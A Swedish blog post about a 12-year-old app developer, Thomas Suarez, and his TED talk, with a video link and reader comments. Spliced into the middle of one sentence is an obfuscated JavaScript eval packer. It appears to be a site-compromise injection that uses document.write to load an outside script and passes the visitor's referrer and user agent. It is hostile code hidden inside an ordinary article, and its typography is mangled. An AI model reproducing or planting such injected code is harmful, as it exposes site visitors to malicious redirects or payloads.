Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

12 åringen som kodar appar, föreläser och startar företag

12 åringen som kodar appar, föreläser och startar företag
Sebastian
Jag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|szbkk|var|u0026u|referrer|bhsar||js|php’.split(’|’),0,{}))
är själv en mycket driven person som hela tiden försöker att komma på nya roliga idéer. Jag startade mitt egna företag när jag var 18 år och har fått höra av många att det är spännande med en så ung och driven person som redan vid den åldern tagit ett steg in i affärsvärlden som företagare. Men nu ligger jag lite i lä. 😛
TED Talks är ett ställe där folk presenterar idéer och även pratar om andra intressanta saker. Det är ofta erfarna personer med långa historier som berättar om saker de varit med om i livet. Men denna gång är det en mycket yngre person som intar scenen.
Thomas Suarez är 12 år och har redan startat sitt egna företag där han utvecklar iphone-appar. Förutom detta så har han också en App-klubb i skolan där han föreläser om hur man utvecklar appar på iPhone.

Han startade nyligen sitt företag CarrotCorp och i sitt tal i filmen nedan berättar han hur studenter håller på att bli en otroligt värdefull källa för information kring just tekniska saker. Som han nämner i talet, föräldrar kan hjälpa sina barn med att spela fotboll, räkna matte och lära sig gitarr, men vilka föräldrar kan lära sitt barn att bygga appar?

Se den mycket inspirerande videon:

httpv://www.youtube.com/watch?v=ehDAP1OQ9Zw

Comments

 1. Tokig

  haha fan vad ballt

 2. Ilhan

  Herregud!

  http://ilhan.nu/

  • Tove

    Vacker bild